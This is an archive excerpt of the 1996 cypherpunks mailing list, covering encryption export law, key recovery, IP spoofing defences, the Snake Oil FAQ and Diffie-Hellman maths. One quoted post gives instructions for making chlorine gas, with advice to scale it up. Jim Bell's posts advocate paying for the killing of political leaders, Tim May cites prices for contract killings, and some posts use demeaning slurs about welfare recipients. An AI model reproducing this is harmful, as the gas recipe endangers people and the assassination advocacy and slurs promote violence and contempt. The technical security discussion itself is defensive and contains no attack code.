>                   or reexport of computer software and computer
>                   hardware with encryption capabilities under a
>                   general license for nonmilitary end-users in
>                   any foreign country to which those exports of
>                   computers software and computer hardware of
>                   similar capability are permitted for use by
>                   financial institutions that the Secretary
>                   determines not to be controlled in fact by
>                   United States persons.

In other words, the Secretary must define the terms of the general
license in such a way that software of "similar capability" to
software that is exportable to foreign banks is also exportable for
general use.  Note that the requirement is that the software must be
similar to software that can already be exported for use by foreign
banks; it is neither necessary nor sufficient that similar products be
available from foreign sources.  The "similar products available from
foreign competitors" rule was in the Leahy bill, but I see nothing
like it in the pro-CODE bill.

PGP could be held not to be of "similar capability" to the banking
software, and not exportable under the terms of the general license,
because it uses a different encryption algorithm, a different key
length, and is capable of encrypting arbitrary data, not just
financial transactions.  In the future, if key escrow requirements
were imposed on software exported to foreign banks, the same
restriction could be imposed on software exported for general use.

It seems to me that the idea behind section 3(A) is that if foreign
bankers are willing to accept a certain level of encryption, then
everyone else will accept it too, so the software industry will be
able to make money exporting it; the few people who want something
better (e.g. to protect their privacy against government wiretapping)
don't have to be protected, because denying them protection won't cost
the software companies any money.

I include section 3(B) only for completeness, because it is mentioned
in section 3(A):

>               (B) EXCEPTION.-The Secretary shall prohibit the
>                   export or reexport of computer software and
>                   computer hardware described in subparagraph (A)
>                   to a foreign country if the Secretary
>                   determines that there is substantial evidence
>                   that such software and computer hardware will
>                   be-
>                      (i) diverted to a military end-use or an end-
>                   use supporting international terrorism;
>                      (ii) modified for military or terrorist end-
>                   use; or
>                      (iii) reexported without the authorization
>                   required under Federal law.


Do other people agree with this interpretation of the bill?  Are most
people satisfied that the bill would actually protect the right to
export PGP and other strong encryption software?  I haven't seen this
discussed in this group before.  I realize that this may be academic,
because the bill is unlikely to pass now.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 17 Sep 1996 07:32:08 +0800
To: cypherpunks@toad.com
Subject: IBM Boosts Encryption Initiative
Message-ID: <Pine.BSI.3.95.960916125127.12815A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain




http://www.pcweek.com/news/0916/16enc.html
    
               IBM will roll out several security initiatives next month
               that include a new way to build encryption into software
               and technology that could enable U.S. companies to
               export products with strong encryption algorithms.

and uhhh...

               IBM also will introduce several "key-recovery"
               technologies that could enable businesses to export
               encrypted data or software beyond the current 40-bit
               limit--without breaking U.S. government restrictions

and whoa...

               The sources also added that the technology may satisfy
               the requirement imposed by the U.S. government that it
               be able to access encrypted data on demand.


      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 17 Sep 1996 11:19:15 +0800
To: "James A. Donald" <cypherpunks@toad.com
Subject: Re: Kiddie porn on the Internet
Message-ID: <199609162001.NAA21875@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 AM 9/15/96 -0700, James A. Donald wrote:
>[Allegations that "save the children" is a political organization 
>providing cover for an effort to ban cryptography]
>
>At 01:54 PM 9/9/96 -0400, Hallam-Baker wrote:
>> Their main mission is sending food to Ethiopia and other famine
>> areas, development work etc. It is ultra-worthy stuff.
>
>Not everyone who sends food to the starving children is ultra
>respectable.
>Problem is that the usual cause of starving children is tyranny.  
>In order to get close enough to the starving children to take 
>those cute fund raising photographs you have to pay off and get 
>cosy with tyrants.  This creates a moral hazard, in that it is 
>hard to tell the difference between normal bribery needed to do 
>anything in a tyrannical state, and bribery to bribe tyrants to 
>create starving children for photo ops.
>It is very common for international charities to develop excessively 
>friendly relationships with murderous tyrannies,

Yet another obligatory AP (Assassination Politics) reference:  If a person 
is really interested in helping out "starving children" he may be able to do 
far more good by purchasing the death of the local tyrant(s), rather than 
(just) buying more food.  After all, if the donor really believes that this 
starvation isn't endemic to the country, he has to conclude that it's a 
condition which is forced on the victims. In addition, you almost always 
find that these starving countries have well-supplied militaries, defending 
the local warlords against each other as in Somalia.  Indeed, in Somalia the 
incoming food was actually used to buoy up one group against another, 
because access to it is controlled directly or indirectly by the factions.

Some might argue that the death of a single leader doesn't normally fix the 
problem.  While that's often true, it's normally because there isn't 
an automatic guarantee that the next 20+ leaders will ALSO be killed if they 
display the same problems as the first.  Provide that guarantee, and 
(somewhat paradoxically) not only do you not need to kill the 20+, you 
probably won't have to kill the first one!


(wondering when the world will see the light...)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 17 Sep 1996 08:14:41 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <199609160537.HAA26159@basement.replay.com>
Message-ID: <Pine.SUN.3.94.960916125640.11930A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996, Anonymous wrote:

> Tim May wrote:
> 
> > The thing about _traditional_ charity, of the religious or community sort,
> > was that it was not treated as an "entitlement," as something the resentful
> > masses could "demand" as part of their "human rights."
> 
>    There's no substantial difference between their resentful whining about
> their rights

Such as the "right" to health insurance, the "right" to free checks for
sitting on one's chair, the "right" to be treated preferentially as
equally qualified non-minorities applying to the same job, the "right" to
housing, the "right" to free education, the "right" to be paid three times
what your labor is worth in the lowest bracket jobs.

> and your resentful whining about your rights

The right to personal property.

Beginning to get the picture?

All of the former were created in the last 60 years out of whole cloth
more as "revolution insurance" than anything else.  They are rights
because someone said they were, not because they are well or logically
grounded.

> - except maybe that you whine more.

I should hope he does.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 17 Sep 1996 10:20:52 +0800
To: cypherpunks@toad.com
Subject: Free RSA chip
Message-ID: <Pine.3.89.9609161257.A25232-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


I secured a 30 page data sheet for the new NTT (actually NLC, a subsidiary
of NTT) RSA accelerator chips. The NLC0048 LSI chip can handle keys up to
1024 bits. The secret key can be stored on-chip. If you want a copy of the
data sheet, email me your fax number. 

Furthermore, I have *one* sample chip that I am willing to loan to 
somebody in the SF Bay Area with sufficient hardware knowledge to put the 
chip to good use. If you think you qualify, let me know who you are and 
why you think that you should get the chip. I apologize in advance to the 
qualified candidates that do not get the chip. There is only one (that I 
can loan out).

--Lucky






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 17 Sep 1996 07:54:54 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: That Evil Internet, Pt. XXIII
In-Reply-To: <Pine.LNX.3.93.960915170908.1513E-100000@smoke.suba.com>
Message-ID: <199609161708.NAA26581@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


snow writes:

: 
:      WARNING: DANGEROUS. 
: 
:      Simple advice for the manufacture of Chlorine Gas (similar enough to 
: mustard gas that it has the same effect). 
: 
:      1 bottle of Chlorine Bleach.
:      1 Bottle of lime-away.
: 
:      Hold Breath, mix in open container. Clear the building before you breath
: e
: again. 
: 
:      Use more bottles for a larger area.
: 
:      I did this accidentally when I was young (16), foolish and working 
: for a hospital. That it happened at work (_very_ small amounts of both bleach
: and lime-away) made the Emergency Room visit free and quick. No permanent
: damage, but I was lucky.  
: 

Or one can use the technique my father accidentally discovered when he
was  in school and wanted to electrolyze water.  He made himself a
cell out of a broken light bulb (and wired it in series with a good
light bulb) and then realized that he did not have any sulphuric acid
lying around to use as a catalyst.  So he used table salt instead.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 17 Sep 1996 05:43:35 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <199609160558.WAA11070@dfw-ix6.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.960916130648.8163A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 1996, Bill Stewart wrote:
> 
> >I am on an SPL that is run by an organisation called the "Ecconomic
> >League". It is an organisation run by the UK Conservative party 
> >which keeps lists of "unsafe" employees. Of course the list is 
> (Just because I don't believe in the concept of "corporate slavery"
> doesn't mean I don't think corporations can be offensive.  This sucks...)
> Out of curiousity, I thought the UK had Data Privacy Laws or
> some sort of Database Cops - does that not apply to applications like this?


The Econmic league is not run by the UK Conservative party directly, in 
the same way that the Willie Horton ads were not run by the Bush campaign..

They escape the Data Protection Act by virtue of keeping all this 
information in filing cabinets (at least, they claim to.)

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 13:59:01 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: The GAK Momentum is Building...
Message-ID: <ae636b16010210041dfe@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:59 AM 9/17/96, David Lesher wrote:
>Clarinet sez:
>
>OTTAWA, Sept. 16 (UPI) -- The federal government has chosen
>Northern Telecom's data security software, Entrust { } Public-Key
>Infrastructure (PKI)... for gov't use.....
>
>worth $7.3 million......

Add to this these items:

-- the IBM GAK product

-- the "Clipper IV" (or is it only Clipper III?) GAK announcement expected
"soon"


It seems that several of these announcements are happening at the same
time, which I doubt is coincidental. As the Republican challenger (whose
name escapes me at the moment :-}) is not making an issue out of this, and
is not making any issues out of anything related to liberty issues as near
as I can tell, Clinton and the national security establishment seem to have
free rein (and reign) to deploy GAK>

As Lucky pointed out, GAK now appears inevitable. There's probably still
time to monkeywrench these schemes, though. A few Blaze- or
Wagner/Goldberg-type hacks could undermine confidence in the Key Authority
(not to be confused with the Port Authority, which I presume handles i/o
port assignments).

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 17 Sep 1996 10:52:48 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: The Living and the Dead
Message-ID: <199609162030.NAA23935@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 PM 9/16/96 -0400, Brian Davis wrote:
>On Sun, 15 Sep 1996, jim bell wrote:
>
>> .... 
>> How would an AP-type system treat Robert McNamara?  He'd be dead in a 
>> second.  To those who say, "What good would this do?" I respond: Anyone in 
>  ^^^^^^
>Kind of kills the betting pool, doesn't it?
>
>EBD

Okay, it was just an expression...   

It would probably take a couple weeks.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 17 Sep 1996 10:27:09 +0800
To: cypherpunks@toad.com
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <199609162031.NAA23954@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:00 AM 9/16/96 -0700, Timothy C. May wrote:

>As to the "social safety net," things are far, far beyond a simple safety
>net. When 14-year-old pregnant inner city girls are given money to set up
>their own households (cf. Charles Murray's "Losing Ground"), this is not a
>"safety net," this is subsidized breeding.

A friend of mine (who can be just as coarse as I) calls them 
"Welfare-powered bastard factories."



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 17 Sep 1996 10:55:26 +0800
To: cypherpunks@toad.com
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <199609162031.NAA23962@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 AM 9/16/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>jbugden@smtplink.alis.ca writes:
>> dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote:
>> >Starting with the lying old fart himself.
>> 
>> You shouldn't be so hard on Tim. I tried giving up farting years ago but I =
>> found
>> I gained a lot of weight. It's also become more socially acceptable as evid=
>
>I wonder why containing one's fart would cause one to gain weight. Volume maybe,
>but I'd think that gas weight about as much as the air it displaces.


Actually, less:  It's mostly hydrogen.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Tue, 17 Sep 1996 09:22:01 +0800
To: jya@pipeline.com (John Young)
Subject: Re: IBM_gak
Message-ID: <v01510110ae634e60553d@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain



>   9-13-96. BuWi:
>
>   "Revolutionary Intranet security product to be
>   demonstrated at Interop DotCom "
>
>      DSN's NetFortress fully automates hardware-based
>      authentication, encryption and key exchange into a
>      plug and play solution. It completely eliminates the
>      possibility of IP spoofing, eavesdropping and
>      break-ins. "After installing it, I couldn't even tell
>      which service a given packet was from - everything but
>      the packet header itself was rendered undecipherable
>      as it traversed the Internet." DSN Technology was
>      founded by Dr. Aharon Friedman and Andy Savas.


Thanks, John, for forwarding. I spoke with the DSN folks today. They
developed NetFortress in the U.S. and have recently found a substantial
overseas market for it. "That's definitely a problem for us. We're actively
lobbying senators to pass procode, to get it out of committee." Since of
course multinationals would be unwilling to use DSN stuff under current
export-control regime.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Bashinski <jbash@cisco.com>
Date: Tue, 17 Sep 1996 11:32:38 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: J'accuse!: Whitehouse and NSA vs. Panix and VTW
In-Reply-To: <2.2.32.19960916190033.010773d0@vertexgroup.com>
Message-ID: <199609162039.NAA10136@mort>
MIME-Version: 1.0
Content-Type: text/plain


> Well IPSec provides for authentication of endpoints which would identify the
> syn attacker.

Only if the attacker were so stupid as to put in valid authentication
data identifying herself. 

I think IPSEC would allow you to throw away the SYNs without processing
them and without putting anything in your incoming connection queue. On the
other hand, you'd have to do all the authentication protocol and
computation for each packet in order to determine that it was bogus. I can
see where that could lead to a still worse denial-of-service attack if your
IPSEC code wasn't properly written.

> What amazes me is that routers happily pass packets with foreign IP return
> addresses.

Defining what a "foreign IP return address" is quickly becomes complicated.

> I guess there is some valid utility to being able to originate a
> connection that actually goes somewhere else for intiating a many to many
> protocol. But I can't think of any practical application that would
> necessarily be that way.

As far as I know, nothing does that.

> So why do routers let packets leave local networks that do not appear to
> originate from said local network?

Because routers don't know which networks are "local networks" and which
networks are transit networks. When a router gets a packet from one of
its interfaces, it has no way of knowing whether that packet originated
on the local network, or was forwarded on by some other router... possibly
from an original source a dozen network hops away.

> Doesn't routing work "both ways" so to speak?

Um, "both ways"? No, not really, if you mean what I think you mean.  I
think you're saying that, if a router receives a packet claiming to be from
host A, and that packet doesn't come from the direction of host A, as
defined by the direction in which the router itself would send a packet
which was destined for host A, it should drop the packet.

The problem with that is that, if host A sends a packet to host B, there's
no guarantee that the path that packet takes is the same as the path a
packet would take from host B to host A. It usually is, but not
always. Transient routing assymetries are very common in routing protocols,
and it's possible, and even occasionally useful, to set up networks where
there are permanent asymmetries.

It's a pretty basic part of the architecture of IP networks that routers
forward based only on destination addresses. Changing this would break a
lot of existing systems. Keeping both "to" and "from" route information
for each destination would entail redesigning all the routing protocols now
in use, as well as doubling the associated memory and computation
requirements. It won't happen soon, if ever.

It may happen that router vendors will start adding configurable options to
discard suspicious packets in the (pretty common) case where routing is
expected to be symmetric. Such options would have to be used with great
care, by network administrators who were very sure they knew what they were
doing. They couldn't be made the defaults without breaking the universe, so
there'd always be people who should turn them on, but wouldn't.

As it stands today, it's possibly to manually configure a router to reject
packets that don't come from addresses expected on the interface the
packets arrive on. Such filters are entirely static, and don't respond to
changes in the network. It's reasonable to set them up on a "stub" link
that forms the only path leading to a reasonably well-defined segment of
the network...  like a LAN, or a small site. It's much less reasonable on a
router in the middle of a complex network, and more or less impossible in
Internet "core" routers... unless you can anticipate every possible dynamic
network change, your filters are going to get it wrong sometimes.

Myself, I always configure routers to filter out bogus source
addresses... when they're being installed at points in the network where
it's obvious which addresses those are. Most ISPs don't do it even when
it's easy, and that's one of the sources of the problem.

					-- John B. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 17 Sep 1996 09:15:03 +0800
To: gnu@toad.com
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
Message-ID: <01I9JR9M8PLC8Y4X3Y@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"gnu@toad.com"  "John Gilmore" 16-SEP-1996 10:13:36.24

>While you are at it, you could move just the censored material to a
>separate IP address from the rest of the archives, and issue Web
>redirects for requests sent to the old address.  In fact it might be
>interesting to redirect readers to various mirror sites automatically,
>at random and in rotation.  Thus, when someone connects to your web
>site to read censored material, they will be automatically redirected
>to one of dozens or hundreds of other places where the material can be
>found.  The German censors will likely find it impossible to block
>access to all those sites (and each such site can also be changing its
>IP address periodically).

	The first part (redirection at random) can be done via a CGI script;
this may be useful for those wishing to put in links to a mirror site without
having to choose a particular one or host it themselves. Incidentally, speaking
of mirror sites, I'd be interested in locating scripts to do the following:
	A. Automatically redirect someone to an appropriate mirror site based
		upon closeness to their originating IP address
	B. Automatically poll (via crontab or similar mechanisms) between
		mirror sites (and to the anonymizer) to see if they're up,
		using the first part to redirect accordingly.

	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 15:42:47 +0800
To: cypherpunks@toad.com
Subject: Re: Judge Kozinski Responds
Message-ID: <ae636d8c02021004b22d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:21 PM 9/16/96, Jim Ray wrote:

>I have been having a private e-mail conversation with Judge Alex Kozinski of
>the 9th circuit. Today he said:

>>Halloween, it only really works when the people dressed up
>>are about four feet tall.  In the rare instances where there
>>have been adults at my door that were so disguised you
>>couldn't tell who they were, I felt threatened--kept my
>>Glock handy before opening door.

I'll only comment on this one item, for now.

Any judge who talks about keeping his Glock handy has my vote.

(Of course, I've heard of such things many times before. Chief Supreme
Warren Burger once got a lot of publicity by answering his door--in
D.C.--with a revolver in one hand. I suspect that an awful lot of judges
fully appreciate the kind of perps that are out there, and know the threats
they could face, both from random acts of violence and home invasion and
from targetted acts of revenge. As they learn that perps they send away to
prison are requesting archived copies of "Assassination Politics," I rather
expect their paranoia will increase sharply.)

(Hint: One reason I seldom discuss AP is that to me it's just a special
case of the larger issue of untraceable markets for such acts, something
I've been worried about for almost a decade now. There is little reason to
engage in the fiction of a "betting pool" when a hit may be untraceably
contracted for and the standard fee ($1000 or less in some inner cities,
$5000 for ordinary suburbanites, $30,000 or more for high-profile
cases...so I hear) be paid with untraceable cash...as soon as truly
untraceable digital cash becomes a reality.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 17 Sep 1996 10:31:35 +0800
To: cmcurtin@research.megasoft.com
Subject: Re: Snake Oil FAQ 0.4 [comments appreciated]
Message-ID: <199609161749.NAA14132@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


For those not-yet-in-the-know: I no longer have the time to manage it 
and asked for somebody (and Matt agreed to) to take the Snake Oil
FAQ's care and feeding.

Note that this is not cc'd to coderpunks. I don't 
think it's appropriate for coderpunks.

On 16 Sep 96 at 9:56, C Matthew Curtin wrote:
[..]
> --------------------------- snake-oil-faq ----------------------------
> 
>                            Snake-Oil Warning Signs
>                         Encryption Software to Avoid
[..]
> The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt,
> alt.security, comp.security, and comp.infosystems. We're targeting those who

Does it need to be posted monthly?  Better to post pointers to it 
most of the time, possibly to other places as well  (alt.2600 comes
to mind...).

Perhaps when the first 'non-beta' of this document is released a 
History could be added.

[..]
 
> Different products will serve different needs, and it's rare that a product
> will serve every need. (Sometimes a product won't be needed: it may be

Nitpick: Hm. Change that to "no product will serve every need".

> better to use a utility to encrypt files, transmit them over a network using
> standard file transfer tools, and decrypt them at the other end than to use
> a separate encrypted utility in some cases.)

Or more clearly: is encryption THE feature of the utility, or is it 
an added feature?  It's better to use separate utilities made for 
that purpose rather than one that tries to do everything.
[..]
> Key Sizes
> 
> Some ciphers, while currently secure against most attacks, are not
> considered viable in the next few years because of relatively small keysizes
> and increasing processor speeds (making a brute-force attacks feasible). The

Change to "making brute force attacks--that is, trying every possible 
key--feasible".

[..]
>                     Symmetric and Public-Key Lengths With
>                   Similar Resistance to Brute-Force Attacks
> 
>                  Symmetric Key Length Public-key Key Length
>                         56 bits             384 bits
>                         64 bits             512 bits
>                         80 bits             768 bits
>                        112 bits             1792 bits
>                        128 bits             2304 bits

That's a controversial comparison. I've read references (from a 
couple of years ago) saying that a 3k-bit RSA key is as strong as a 
128-bit IDEA key.

Trying to compare the two (symmetric and assymetric) is like running 
through a tar pit.

> Some Common Snake-Oil Warning Signs
> 
> The following are some of the "red flags" one should watch for when
> examining an encryption product
> 
>    * Technobabble
[..]
>      A sign of technobabble is a descrption which drops a lot of technical
>      terms for how the system works without actually explaining how it
>      works. Often specifically coined terms are used to describe the scheme
>      which are not found in the literature.

Of course, how is an amateur supposed to know if these terms are 
found in the literature? That was a recurring comment that people 
sent me when I first posted the FAQ.
[..]
>      Just because software uses to different method of computation 

Typo! "uses to different method..."?
[..]
>      grounded in mathematical theory. The security is based on problems that
>      are believed, if not known to be hard to solve.

Hm. How about "that are widely believed"?
 
[..] 
>      A OTP system is not an algorithm. It works by having a "pad" of
>      random bits in the possession of both the sender and recipient.
[..]
>      never again be used. The bits in the pad must be truly random,
>      generated using a real random source, such as specialized
>      hardware, radioactive decay timings, etc., and not from an
>      algorithm or cipher. Anything else is not a one-time-pad.

Although it is(?) mentioned below, I'd emphasize here in some way that 
the users of the OTP generate the key.  Somebody else sending you a 
supposed OTP that he generated is not secure.

>      The vendor may confuse random session keys or initialization vectors
>      with OTPs.

Explain random session keys and initialization vectors.  A glossary 
at the end of the document would be a good thing.

>      Sometimes attacks are theoretical or impractical (requiring special
>      circumstances or massive computing power running for many years), and
>      it's easy to confuse a layman by mentioning these.

Oh yeah.  These need to be explained.  What I had in mind was timing 
attacks against RSA or IDEA, or factoring of public keys.

>    * Keys and Passwords
> 
>      The "key" and the "password" are often not the same thing. The "key"

"often" not?!? (oops...was that my wording?) They aren't the same, 
though often they are confused in snake oil.
[..]

>      If there's a third-party utility that can crack the software,
>      avoid it.
> 
>      If the vendor claims it can recover lost passwords (without using a
>      key-backup or escrow feature), avoid it.
> 
>      If there is a key-backup or escrow feature, are you in control
>      of the backup, or does the vendor or someone else hold a copy
>      of the key?

That is, if you lose the key, you don't want a third party to have as 
much a chance to recover it as you do.

[..]
> 
>      If the vendor is unaware of export restrictions, avoid the software:
>      the vendor is not familiar with the state of the art.

Also... if the vendor does not understand export restrictions, avoid 
the software. I'm thinking of a certain snoil-vendor who said 128-bit 
IDEA keys were'nt secure since they could be exported.

>      Because of export restrictions, some legitimate (not-Snake Oil)
>      products may have a freely exportable version for outside of the USA,
>      which is different from a separate US/Canada-only distribution. Also

Such exportable versions are not as secure, of course.
[..]
> Other Considerations
> 
> Interface isn't everything: user-friendliness is an important factor, but if
> the product isn't secure then you're better off with something that is
> secure (if not as easy to use).
> 
> No product is secure if it's not used properly. You can be the weakest link
> in the chain if you use a product carelessly. Do not trust any product to be
> foolproof, and be wary any product that claims it is.

I wanted to add some sort of 'non-guru hacks' to test a product. One 
example might be to actually examine 'encrypted' files to see if they 
are really encrypted. (I'm thinking of the AMG archiver, which only 
encrypted the CRC; CODEC archiver also only encrypted the CRC is a 
file is not compressed.)

Thanks again for taking over the FAQ.  A good job!

Rob
 
---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 17 Sep 1996 10:29:52 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 15 Sept 1996
Message-ID: <01I9JSD6BN2K8Y4X3Y@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu" 16-SEP-1996 10:15:59.50
>To:	IN%"edupage@elanor.oit.unc.edu"  "EDUCOM Edupage Mailing List"

>************************************************************
>Edupage, 15 September 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>************************************************************

>SATELLITE BROADCASTERS MUST PROVIDE EDUCATION, TOO
>A federal appeals court in Washington has ruled that any company providing
>direct broadcast satellite (DBS) services must "reserve a portion of its
>channel capacity, equal to not less than 4 percent nor more than 7 percent,
>exclusively for noncommercial programming of an educational or information
>nature," in compliance with regulations drafted by the FCC to enforce laws
>enacted in 1984 and 1992.  The unanimous decision rejected arguments by Time
>Warner and other broadcasters that the law interfered with their First
>Amendment rights.  "It is the right of the viewers and listeners, not the
>right of the broadcasters, which is paramount," said the court, quoting a
>1969 Supreme Court ruling.  (Chronicle of Higher Education 13 Sep 96 A29)

	Bloody socialist Supreme Court... sell the _full_ rights, then use
the money to reduce taxes.

>SYSTEM CRACKER GOT RECIPE FROM HACKER MAGAZINE
>The person who disabled New York's Panix Internet service probably followed
>the line-by-line instructions for doing so that appeared in the latest issue
>of 2600 magazine, the Hacker's Quarterly.  "We need to educate the community
>that it's very, very simple to cause massive mayhem," says 2600's editor,
>who defended his editorial judgment.  "A lot of companies subscribe to us so
>they can learn before they're victimized."  Panix's co-owner says he
>supports 2600's right to publish such information:  "As a matter of
>principle I don't think they should have been stopped," but adds that unlike
>most other recipes for breaching security published in the magazine, this
>one has no known technical defense.  (Wall Street Journal 13 Sep 96 B5)

	Helpful to quote Panix on it.

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>***********************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Henry R. Luce (if your name is Henry R. Luce;  otherwise, substitute your
>own name).  ...  To cancel, send a message to: listproc@educom.unc.edu with
>the message: unsubscribe edupage.   (If you have subscription problems, send
>mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brock N. Meeks" <brock@well.com>
Date: Tue, 17 Sep 1996 13:42:08 +0800
To: cypherpunks@toad.com
Subject: All Bets Off
Message-ID: <Pine.3.89.9609161420.A11988-0100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Just so this isn't hanging in cyberspace forever, my $5,000 bet for 
anyone to prove the TWA 800 flight was downed by a U.S. missile is now 
*off the table*.  


It's been two-plus weeks since I tossed out the bet and no one took me up 
on it, so it's now being formally withdrawn.

--Brock




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 17 Sep 1996 10:40:03 +0800
To: cypherpunks@toad.com
Subject: Diffie Hellman - logs in Galois fields
Message-ID: <842896368.27767.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Hi all,

A question for the matematicians out there:

I am looking at the Diffie Hellman public key exchange protocol and 
am trying to find out why it is computationally hard to take logs in 
a finite (Galois) field.

My maths tutor has told me a bit about the construction of Galois 
fields (If I`m correct the construction is Z mod N, N some integer, 
then a transformation F(x) on the residue classes already in the 
field) I know also the definition is that there are P**k elements, p 
a prime.

My questions are as follows:

1. How can a field be finite, as by definition it has to be closed 
under addition, subtraction, multiplication and division???? (sorry 
if this one is a bit of a no brainer, maybe the definition is 
different but I can`t seem to see how)

2. Why is taking logs in a finite field computationally hard? - Me 
and Alec (My maths tutor at college) guessed that it is because 
